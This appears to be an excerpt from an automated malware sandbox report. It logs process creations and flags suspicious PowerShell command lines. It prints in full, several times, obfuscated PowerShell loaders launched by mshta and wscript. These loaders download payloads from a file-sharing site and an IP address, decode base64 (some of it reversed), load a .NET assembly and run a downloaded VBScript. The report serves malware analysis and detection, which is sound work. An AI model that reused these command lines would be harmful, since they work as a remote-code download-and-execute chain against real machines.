Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
